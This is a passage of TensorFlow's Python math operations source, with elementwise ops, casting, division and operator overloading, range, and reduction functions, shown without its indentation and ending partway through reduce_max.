from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import state_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_math_ops import *
# pylint: enable=wildcard-import
# Aliases for some automatically-generated names.
argmax = gen_math_ops.arg_max
argmin = gen_math_ops.arg_min
linspace = gen_math_ops.lin_space
# pylint: disable=anomalous-backslash-in-string,protected-access
def abs(x, name=None):
"""Computes the absolute value of a tensor.
Given a tensor of real numbers `x`, this operation returns a tensor
containing the absolute value of each element in `x`. For example, if x is
an input element and y is an output element, this operation computes
\\\\(y = |x|\\\\).
See [`tf.complex_abs()`](#tf_complex_abs) to compute the absolute value of a complex
number.
Args:
x: A `Tensor` or `SparseTensor` of type `float32`, `float64`, `int32`, or
`int64`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` the same size and type as `x` with absolute
values.
"""
with ops.name_scope(name, "Abs", [x]) as name:
if isinstance(x, ops.SparseTensor):
if x.values.dtype in (dtypes.complex64, dtypes.complex128):
x_abs = gen_math_ops.complex_abs(x.values,
Tout=x.values.dtype.real_dtype, name=name)
return ops.SparseTensor(indices=x.indices, values=x_abs, shape=x.shape)
x_abs = gen_math_ops._abs(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_abs, shape=x.shape)
else:
x = ops.convert_to_tensor(x, name="x")
if x.dtype in (dtypes.complex64, dtypes.complex128):
return gen_math_ops.complex_abs(x, Tout=x.dtype.real_dtype, name=name)
return gen_math_ops._abs(x, name=name)
def divide(x, y, name=None):
"""Computes Python style division of `x` by `y`."""
with ops.name_scope(name, "Divide", [x]) as name:
return x / y
def neg(x, name=None):
"""Computes numerical negative value element-wise.
I.e., \\(y = -x\\).
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `int32`, `int64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Neg", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_neg = gen_math_ops.neg(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_neg, shape=x.shape)
else:
return gen_math_ops.neg(x, name=name)
def sign(x, name=None):
"""Returns an element-wise indication of the sign of a number.
`y = sign(x) = -1` if `x < 0`; 0 if `x == 0`; 1 if `x > 0`.
For complex numbers, `y = sign(x) = x / |x|` if `x != 0`, otherwise `y = 0`.
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `int32`, `int64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Sign", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_sign = gen_math_ops.sign(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_sign, shape=x.shape)
else:
return gen_math_ops.sign(x, name=name)
def square(x, name=None):
"""Computes square of x element-wise.
I.e., \\(y = x * x = x^2\\).
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `int32`, `int64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`. Has the same type as `x`.
"""
with ops.name_scope(name, "Square", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_square = gen_math_ops.square(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_square, shape=x.shape)
else:
return gen_math_ops.square(x, name=name)
def sqrt(x, name=None):
"""Computes square root of x element-wise.
I.e., \\(y = \sqrt{x} = x^{1/2}\\).
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Sqrt", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_sqrt = gen_math_ops.sqrt(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_sqrt, shape=x.shape)
else:
return gen_math_ops.sqrt(x, name=name)
def erf(x, name=None):
"""Computes the Gauss error function of `x` element-wise.
Args:
x: A `Tensor` of `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Erf", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_erf = gen_math_ops.erf(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_erf, shape=x.shape)
else:
return gen_math_ops.erf(x, name=name)
def complex_abs(x, name=None):
r"""Computes the complex absolute value of a tensor.
Given a tensor `x` of complex numbers, this operation returns a tensor of type
`float32` or `float64` that is the absolute value of each element in `x`. All
elements in `x` must be complex numbers of the form \\(a + bj\\). The
absolute value is computed as \\( \sqrt{a^2 + b^2}\\).
For example:
```
# tensor 'x' is [[-2.25 + 4.75j], [-3.25 + 5.75j]]
tf.complex_abs(x) ==> [5.25594902, 6.60492229]
```
Args:
x: A `Tensor` of type `complex64` or `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32` or `float64`.
"""
return gen_math_ops.complex_abs(x, Tout=x.dtype.real_dtype, name=name)
def scalar_mul(scalar, x):
"""Multiplies a scalar times a `Tensor` or `IndexedSlices` object.
Intended for use in gradient code which might deal with `IndexedSlices`
objects, which are easy to multiply by a scalar but more expensive to
multiply with arbitrary tensors.
Args:
scalar: A 0-D scalar `Tensor`. Must have known shape.
x: A `Tensor` or `IndexedSlices` to be scaled.
Returns:
`scalar * x` of the same type (`Tensor` or `IndexedSlices`) as `x`.
Raises:
ValueError: if scalar is not a 0-D `scalar`.
"""
scalar = ops.convert_to_tensor(scalar, dtype=x.dtype.base_dtype,
name="scalar")
shape = scalar.get_shape()
if shape.ndims == 0:
if isinstance(x, ops.IndexedSlices):
return ops.IndexedSlices(scalar * x.values, x.indices, x.dense_shape)
else:
return scalar * x
else:
raise ValueError("Only scalar multiply works, got shape %s" % shape)
def pow(x, y, name=None):
"""Computes the power of one value to another.
Given a tensor `x` and a tensor `y`, this operation computes \\\\(x^y\\\\) for
corresponding elements in `x` and `y`. For example:
```
# tensor 'x' is [[2, 2], [3, 3]]
# tensor 'y' is [[8, 16], [2, 3]]
tf.pow(x, y) ==> [[256, 65536], [9, 27]]
```
Args:
x: A `Tensor` of type `float32`, `float64`, `int32`, `int64`, `complex64`,
or `complex128`.
y: A `Tensor` of type `float32`, `float64`, `int32`, `int64`, `complex64`,
or `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor`.
"""
with ops.name_scope(name, "Pow", [x]) as name:
return gen_math_ops._pow(x, y, name=name)
def complex(real, imag, name=None):
"""Converts two real numbers to a complex number.
Given a tensor `real` representing the real part of a complex number, and a
tensor `imag` representing the imaginary part of a complex number, this
operation returns complex numbers elementwise of the form \\(a + bj\\), where
*a* represents the `real` part and *b* represents the `imag` part.
The input tensors `real` and `imag` must have the same shape.
For example:
```
# tensor 'real' is [2.25, 3.25]
# tensor `imag` is [4.75, 5.75]
tf.complex(real, imag) ==> [[2.25 + 4.75j], [3.25 + 5.75j]]
```
Args:
real: A `Tensor`. Must be one of the following types: `float32`, `float64`.
imag: A `Tensor`. Must have the same type as `real`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64` or `complex128`.
"""
real = ops.convert_to_tensor(real, name="real")
imag = ops.convert_to_tensor(imag, name="imag")
with ops.name_scope(name, "Complex", [real, imag]) as name:
input_types = (real.dtype, imag.dtype)
if input_types == (dtypes.float64, dtypes.float64):
Tout = dtypes.complex128
elif input_types == (dtypes.float32, dtypes.float32):
Tout = dtypes.complex64
else:
raise TypeError("real and imag have incorrect types: "
"{} {}".format(real.dtype.name, imag.dtype.name))
return gen_math_ops._complex(real, imag, Tout=Tout, name=name)
def real(input, name=None):
"""Returns the real part of a complex number.
Given a tensor `input` of complex numbers, this operation returns a tensor of
type `float32` or `float64` that is the real part of each element in `input`.
All elements in `input` must be complex numbers of the form \\(a + bj\\),
where *a* is the real part returned by this operation and *b* is the
imaginary part.
For example:
```
# tensor 'input' is [-2.25 + 4.75j, 3.25 + 5.75j]
tf.real(input) ==> [-2.25, 3.25]
```
If `input` is already real, it is returned unchanged.
Args:
input: A `Tensor`. Must have numeric type.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32` or `float64`.
"""
with ops.name_scope(name, "Real", [input]) as name:
real_dtype = input.dtype.real_dtype
if input.dtype.base_dtype == real_dtype:
return input
return gen_math_ops.real(input, Tout=real_dtype, name=name)
def imag(input, name=None):
"""Returns the imaginary part of a complex number.
Given a tensor `input` of complex numbers, this operation returns a tensor of
type `float32` or `float64` that is the imaginary part of each element in
`input`. All elements in `input` must be complex numbers of the form \\(a +
bj\\), where *a* is the real part and *b* is the imaginary part returned by
this operation.
For example:
```
# tensor 'input' is [-2.25 + 4.75j, 3.25 + 5.75j]
tf.imag(input) ==> [4.75, 5.75]
```
Args:
input: A `Tensor`. Must be one of the following types: `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32` or `float64`.
"""
with ops.name_scope(name, "Imag", [input]) as name:
return gen_math_ops.imag(input, Tout=input.dtype.real_dtype, name=name)
def round(x, name=None):
"""Rounds the values of a tensor to the nearest integer, element-wise.
  Rounds half to even. Also known as banker's rounding. If you want to round
according to the current system rounding mode use tf::cint.
For example:
```python
# 'a' is [0.9, 2.5, 2.3, 1.5, -4.5]
tf.round(a) ==> [ 1.0, 2.0, 2.0, 2.0, -4.0 ]
```
Args:
x: A `Tensor` of type `float32` or `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as `x`.
"""
x = ops.convert_to_tensor(x, name="x")
if x.dtype.is_integer:
return x
else:
# TODO(nolivia): Switch to new Round op
# return gen_math_ops.round(x, name=name)
return gen_math_ops.floor(x + 0.5, name=name)
ops.RegisterShape("Round")(common_shapes.call_cpp_shape_fn)
def cast(x, dtype, name=None):
"""Casts a tensor to a new type.
The operation casts `x` (in case of `Tensor`) or `x.values`
(in case of `SparseTensor`) to `dtype`.
For example:
```python
# tensor `a` is [1.8, 2.2], dtype=tf.float
tf.cast(a, tf.int32) ==> [1, 2] # dtype=tf.int32
```
Args:
x: A `Tensor` or `SparseTensor`.
dtype: The destination type.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x`.
Raises:
TypeError: If `x` cannot be cast to the `dtype`.
"""
base_type = dtypes.as_dtype(dtype).base_dtype
with ops.name_scope(name, "Cast", [x]) as name:
if isinstance(x, ops.SparseTensor):
values_cast = cast(x.values, base_type, name=name)
return ops.SparseTensor(x.indices, values_cast, x.shape)
else:
# TODO(touts): Handle what Josh said.
#
# Could return ops.convert_to_tensor(x, dtype=dtype, ...) here, but that
# allows some conversions that cast() can't do, e.g. casting numbers to
# strings.
x = ops.convert_to_tensor(x, name="x")
if x.dtype.base_dtype == base_type:
return x
return gen_math_ops.cast(x, base_type, name=name)
def saturate_cast(value, dtype, name=None):
"""Performs a safe saturating cast of `value` to `dtype`.
This function casts the input to `dtype` without applying any scaling. If
there is a danger that values would over or underflow in the cast, this op
applies the appropriate clamping before the cast.
Args:
value: A `Tensor`.
dtype: The desired output `DType`.
name: A name for the operation (optional).
Returns:
`value` safely cast to `dtype`.
"""
# When casting to a type with smaller representable range, clamp.
# Note that this covers casting to unsigned types as well.
with ops.name_scope(name, "saturate_cast", [value]) as name:
value = ops.convert_to_tensor(value, name="value")
dtype = dtypes.as_dtype(dtype).base_dtype
if value.dtype.min < dtype.min:
value = gen_math_ops.maximum(value, ops.convert_to_tensor(
dtype.min, dtype=value.dtype, name="min"))
if value.dtype.max > dtype.max:
value = gen_math_ops.minimum(value, ops.convert_to_tensor(
dtype.max, dtype=value.dtype, name="max"))
return cast(value, dtype, name=name)
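# Illustrative behaviour (example values): saturate_cast(300.0, tf.uint8) clamps the value
# to 255 before casting, and saturate_cast(-5.0, tf.uint8) clamps it to 0, whereas a plain
# cast applies no clamping.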
def to_float(x, name="ToFloat"):
"""Casts a tensor to type `float32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float32`.
Raises:
TypeError: If `x` cannot be cast to the `float32`.
"""
return cast(x, dtypes.float32, name=name)
def to_double(x, name="ToDouble"):
"""Casts a tensor to type `float64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float64`.
Raises:
TypeError: If `x` cannot be cast to the `float64`.
"""
return cast(x, dtypes.float64, name=name)
def to_int32(x, name="ToInt32"):
"""Casts a tensor to type `int32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int32`.
Raises:
TypeError: If `x` cannot be cast to the `int32`.
"""
return cast(x, dtypes.int32, name=name)
def to_int64(x, name="ToInt64"):
"""Casts a tensor to type `int64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int64`.
Raises:
TypeError: If `x` cannot be cast to the `int64`.
"""
return cast(x, dtypes.int64, name=name)
def to_bfloat16(x, name="ToBFloat16"):
"""Casts a tensor to type `bfloat16`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `bfloat16`.
Raises:
TypeError: If `x` cannot be cast to the `bfloat16`.
"""
return cast(x, dtypes.bfloat16, name=name)
ops.Tensor._override_operator("__neg__", gen_math_ops.neg)
ops.Tensor._override_operator("__abs__", abs)
# __invert__ corresponds to the ~ operator. Here we follow the numpy convention
# ~ marks an elementwise bit-wise inverse. This is only implemented for boolean
# tensors and will throw a TypeError if used on nonboolean arrays
ops.Tensor._override_operator("__invert__", gen_math_ops.logical_not)
def _OverrideBinaryOperatorHelper(func, op_name, clazz_object=ops.Tensor):
"""Register operators with different tensor and scalar versions.
If `clazz_object` is `SparseTensor`, assumes `func` takes `(sp_indices,
sp_values, sp_shape, dense)` and outputs `(new_sp_values)`.
Args:
func: the operator
op_name: name of the operator being overridden
clazz_object: class to override for. Either `Tensor` or `SparseTensor`.
"""
def binary_op_wrapper(x, y):
with ops.name_scope(None, op_name, [x, y]) as name:
if not isinstance(y, ops.SparseTensor):
y = ops.convert_to_tensor(y, dtype=x.dtype.base_dtype, name="y")
return func(x, y, name=name)
def binary_op_wrapper_sparse(sp_x, y):
with ops.name_scope(None, op_name, [sp_x, y]) as name:
y = ops.convert_to_tensor(y, dtype=sp_x.dtype.base_dtype, name="y")
return ops.SparseTensor(sp_x.indices, func(sp_x.indices, sp_x.values,
sp_x.shape, y, name=name),
sp_x.shape)
def r_binary_op_wrapper(y, x):
with ops.name_scope(None, op_name, [x, y]) as name:
x = ops.convert_to_tensor(x, dtype=y.dtype.base_dtype, name="x")
return func(x, y, name=name)
# Propagate func.__doc__ to the wrappers
try:
doc = func.__doc__
except AttributeError:
doc = None
binary_op_wrapper.__doc__ = doc
r_binary_op_wrapper.__doc__ = doc
binary_op_wrapper_sparse.__doc__ = doc
if clazz_object is ops.Tensor:
clazz_object._override_operator("__%s__" % op_name, binary_op_wrapper)
del binary_op_wrapper
clazz_object._override_operator("__r%s__" % op_name, r_binary_op_wrapper)
del r_binary_op_wrapper
else:
clazz_object._override_operator("__%s__" % op_name,
binary_op_wrapper_sparse)
del binary_op_wrapper_sparse
# Conversion table for __truediv__. None entries mean no conversion required.
_TRUEDIV_TABLE = {
dtypes.uint8: dtypes.float32,
dtypes.int8: dtypes.float32,
dtypes.uint16: dtypes.float32,
dtypes.int16: dtypes.float32,
dtypes.int32: dtypes.float64,
dtypes.int64: dtypes.float64,
dtypes.float16: None,
dtypes.float32: None,
dtypes.float64: None,
dtypes.complex64: None,
dtypes.complex128: None,
}
# NOTE: the support of "sparse (true)div dense" is currently not baked in into
# "tf.(true_)div()". Until such an API decision is made, the supported usage is
# to explicitly use the "/" operator to invoke either truediv or div.
def _sparse_dense_truediv(sp_indices, sp_values, sp_shape, y, name=None):
"""Internal helper function for 'sp_t / dense_t'."""
with ops.name_scope(name, "truediv",
[sp_indices, sp_values, sp_shape, y]) as name:
sp_values = ops.convert_to_tensor(sp_values, name="sp_values")
y = ops.convert_to_tensor(y, name="y")
x_dtype = sp_values.dtype.base_dtype
y_dtype = y.dtype.base_dtype
if x_dtype != y_dtype:
raise TypeError("x and y must have the same dtype, got %r != %r" %
(x_dtype, y_dtype))
try:
dtype = _TRUEDIV_TABLE[x_dtype]
except KeyError:
raise TypeError("Invalid dtype %r in __truediv__" % x_dtype)
if dtype is not None:
sp_values = cast(sp_values, dtype)
y = cast(y, dtype)
return gen_sparse_ops.sparse_dense_cwise_div(sp_indices, sp_values,
sp_shape, y, name=name)
def truediv(x, y, name=None):
"""Divides x / y elementwise, always producing floating point results.
The same as `tf.div` for floating point arguments, but casts integer arguments
to floating point before dividing so that the result is always floating point.
This op is generated by normal `x / y` division in Python 3 and in Python 2.7
with `from __future__ import division`. If you want integer division that
rounds down, use `x // y` or `tf.floordiv`.
`x` and `y` must have the same numeric type. If the inputs are floating
point, the output will have the same type. If the inputs are integral, the
inputs are cast to `float32` for `int8` and `int16` and `float64` for `int32`
and `int64` (matching the behavior of Numpy).
Args:
x: `Tensor` numerator of numeric type.
y: `Tensor` denominator of numeric type.
name: A name for the operation (optional).
Returns:
`x / y` evaluated in floating point.
Raises:
TypeError: If `x` and `y` have different dtypes.
"""
with ops.name_scope(name, "truediv", [x, y]) as name:
x = ops.convert_to_tensor(x, name="x")
y = ops.convert_to_tensor(y, name="y")
x_dtype = x.dtype.base_dtype
y_dtype = y.dtype.base_dtype
if x_dtype != y_dtype:
raise TypeError("x and y must have the same dtype, got %r != %r" %
(x_dtype, y_dtype))
try:
dtype = _TRUEDIV_TABLE[x_dtype]
except KeyError:
raise TypeError("Invalid dtype %r in __truediv__" % x_dtype)
if dtype is not None:
x = cast(x, dtype)
y = cast(y, dtype)
return gen_math_ops.div(x, y, name=name)
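# Illustrative behaviour: with two int32 tensor arguments, truediv casts both to float64
# first (per _TRUEDIV_TABLE), so e.g. 3 / 4 evaluates to 0.75 rather than 0.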
def floordiv(x, y, name=None):
"""Divides `x / y` elementwise, rounding down for floating point.
The same as `tf.div(x,y)` for integers, but uses `tf.floor(tf.div(x,y))` for
floating point arguments so that the result is always an integer (though
possibly an integer represented as floating point). This op is generated by
`x // y` floor division in Python 3 and in Python 2.7 with
`from __future__ import division`.
Note that for efficiency, `floordiv` uses C semantics for negative numbers
(unlike Python and Numpy).
`x` and `y` must have the same type, and the result will have the same type
as well.
Args:
x: `Tensor` numerator of real numeric type.
y: `Tensor` denominator of real numeric type.
name: A name for the operation (optional).
Returns:
`x / y` rounded down (except possibly towards zero for negative integers).
Raises:
TypeError: If the inputs are complex.
"""
with ops.name_scope(name, "floordiv", [x, y]) as name:
x = ops.convert_to_tensor(x, name="x")
dtype = x.dtype
if dtype.is_floating:
return gen_math_ops.floor(gen_math_ops.div(x, y), name=name)
else:
if not dtype.is_integer:
raise TypeError("Expected floating point or integer, got %r" % dtype)
# TODO(aselle): Switch to math_ops.floor_div() when ready
# return gen_math_ops.floor_div(x, y, name=name)
return gen_math_ops.div(x, y, name=name)
def _mul_dispatch(x, y, name=None):
"""Dispatches cwise mul for "Dense*Dense" and "Dense*Sparse"."""
is_tensor_y = isinstance(y, ops.Tensor)
if is_tensor_y:
return gen_math_ops.mul(x, y, name=name)
else:
assert isinstance(y, ops.SparseTensor) # Case: Dense * Sparse.
new_vals = gen_sparse_ops.sparse_dense_cwise_mul(y.indices, y.values,
y.shape, x, name)
return ops.SparseTensor(y.indices, new_vals, y.shape)
_OverrideBinaryOperatorHelper(gen_sparse_ops.sparse_dense_cwise_div, "div",
ops.SparseTensor)
_OverrideBinaryOperatorHelper(_sparse_dense_truediv, "truediv",
ops.SparseTensor)
_OverrideBinaryOperatorHelper(gen_sparse_ops.sparse_dense_cwise_mul, "mul",
ops.SparseTensor)
_OverrideBinaryOperatorHelper(gen_math_ops.add, "add")
_OverrideBinaryOperatorHelper(gen_math_ops.sub, "sub")
_OverrideBinaryOperatorHelper(_mul_dispatch, "mul")
_OverrideBinaryOperatorHelper(gen_math_ops.div, "div")
_OverrideBinaryOperatorHelper(truediv, "truediv")
_OverrideBinaryOperatorHelper(floordiv, "floordiv")
# TODO(aselle): Switch mod to floor_mod when ready
# _OverrideBinaryOperatorHelper(gen_math_ops.floor_mod, "mod")
_OverrideBinaryOperatorHelper(gen_math_ops.mod, "mod")
_OverrideBinaryOperatorHelper(pow, "pow")
def logical_xor(x, y, name="LogicalXor"):
"""x ^ y = (x | y) & ~(x & y)."""
# TODO(alemi) Make this a cwise op if people end up relying on it.
return gen_math_ops.logical_and(
gen_math_ops.logical_or(x, y),
gen_math_ops.logical_not(gen_math_ops.logical_and(x, y)),
name=name)
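# Illustrative truth table:
#   logical_xor([True, True, False, False],
#               [True, False, True, False])  ->  [False, True, True, False]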
_OverrideBinaryOperatorHelper(gen_math_ops.logical_and, "and")
_OverrideBinaryOperatorHelper(gen_math_ops.logical_or, "or")
_OverrideBinaryOperatorHelper(logical_xor, "xor")
ops.Tensor._override_operator("__lt__", gen_math_ops.less)
ops.Tensor._override_operator("__le__", gen_math_ops.less_equal)
ops.Tensor._override_operator("__gt__", gen_math_ops.greater)
ops.Tensor._override_operator("__ge__", gen_math_ops.greater_equal)
def range(start, limit=None, delta=1, dtype=None, name="range"):
"""Creates a sequence of numbers.
Creates a sequence of numbers that begins at `start` and extends by
increments of `delta` up to but not including `limit`.
The dtype of the resulting tensor is inferred from the inputs unless
it is provided explicitly.
Like the Python builtin `range`, `start` defaults to 0, so that
`range(n) = range(0, n)`.
For example:
```python
# 'start' is 3
# 'limit' is 18
# 'delta' is 3
tf.range(start, limit, delta) ==> [3, 6, 9, 12, 15]
# 'start' is 3
# 'limit' is 1
# 'delta' is -0.5
tf.range(start, limit, delta) ==> [3, 2.5, 2, 1.5]
# 'limit' is 5
tf.range(limit) ==> [0, 1, 2, 3, 4]
```
Args:
start: A 0-D `Tensor` (scalar). Acts as first entry in the range if
`limit` is not None; otherwise, acts as range limit and first entry
defaults to 0.
limit: A 0-D `Tensor` (scalar). Upper limit of sequence,
exclusive. If None, defaults to the value of `start` while the first
entry of the range defaults to 0.
delta: A 0-D `Tensor` (scalar). Number that increments
`start`. Defaults to 1.
dtype: The type of the elements of the resulting tensor.
name: A name for the operation. Defaults to "range".
Returns:
A 1-D `Tensor` of type `dtype`.
"""
if limit is None:
start, limit = 0, start
with ops.name_scope(name, "Range", [start, limit, delta]) as name:
start = ops.convert_to_tensor(start, dtype=dtype, name="start")
limit = ops.convert_to_tensor(limit, dtype=dtype, name="limit")
delta = ops.convert_to_tensor(delta, dtype=dtype, name="delta")
# infer dtype if not explicitly provided
if dtype is None:
dtype_hierarchy = [dtypes.int32, dtypes.int64, dtypes.float32,
dtypes.float64]
assert all(arg.dtype in dtype_hierarchy for arg in [start, limit, delta])
inferred_dtype = max([arg.dtype for arg in [start, limit, delta]],
key=dtype_hierarchy.index)
start = cast(start, inferred_dtype)
limit = cast(limit, inferred_dtype)
delta = cast(delta, inferred_dtype)
return gen_math_ops._range(start, limit, delta, name=name)
@ops.RegisterShape("Range")
def _RangeShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[0, 1, 2])
# Reduction operations
def _ReductionDims(x, reduction_indices):
"""Returns range(0, rank(x)) if reduction_indices is None."""
if reduction_indices is not None:
return reduction_indices
else:
# Fast path: avoid creating Rank and Range ops if ndims is known.
if isinstance(x, ops.Tensor) and x.get_shape().ndims is not None:
return constant_op.constant(np.arange(x.get_shape().ndims),
dtype=dtypes.int32)
if (isinstance(x, ops.SparseTensor) and
x.shape.get_shape().is_fully_defined()):
rank = x.shape.get_shape()[0].value # sparse.shape is a 1-D tensor.
return constant_op.constant(np.arange(rank), dtype=dtypes.int32)
# Otherwise, we rely on Range and Rank to do the right thing at run-time.
return range(0, array_ops.rank(x))
def reduce_sum(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the sum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[1, 1, 1]
# [1, 1, 1]]
tf.reduce_sum(x) ==> 6
tf.reduce_sum(x, 0) ==> [2, 2, 2]
tf.reduce_sum(x, 1) ==> [3, 3]
tf.reduce_sum(x, 1, keep_dims=True) ==> [[3], [3]]
tf.reduce_sum(x, [0, 1]) ==> 6
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._sum(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def count_nonzero(input_tensor, reduction_indices=None, keep_dims=False,
dtype=dtypes.int64, name=None):
"""Computes number of nonzero elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
**NOTE** Floating point comparison to zero is done by exact floating point
equality check. Small values are **not** rounded to zero for purposes of
the nonzero check.
For example:
```python
# 'x' is [[0, 1, 0]
# [1, 1, 0]]
tf.count_nonzero(x) ==> 3
tf.count_nonzero(x, 0) ==> [1, 2, 0]
tf.count_nonzero(x, 1) ==> [1, 2]
tf.count_nonzero(x, 1, keep_dims=True) ==> [[1], [2]]
tf.count_nonzero(x, [0, 1]) ==> 3
```
Args:
input_tensor: The tensor to reduce. Should be of numeric type, or `bool`.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
dtype: The output dtype; defaults to `tf.int64`.
name: A name for the operation (optional).
Returns:
The reduced tensor (number of nonzero values).
"""
with ops.name_scope(name, "count_nonzero", [input_tensor]):
input_tensor = ops.convert_to_tensor(input_tensor, name="input_tensor")
zero = input_tensor.dtype.as_numpy_dtype()
return cast(
reduce_sum(
# int64 reduction happens on GPU
to_int64(gen_math_ops.not_equal(input_tensor, zero)),
reduction_indices=reduction_indices,
keep_dims=keep_dims),
dtype=dtype)
def reduce_mean(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the mean of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[1., 1.]
# [2., 2.]]
tf.reduce_mean(x) ==> 1.5
tf.reduce_mean(x, 0) ==> [1.5, 1.5]
tf.reduce_mean(x, 1) ==> [1., 2.]
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._mean(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_prod(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the product of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._prod(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_min(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the minimum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._min(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_max(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the maximum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
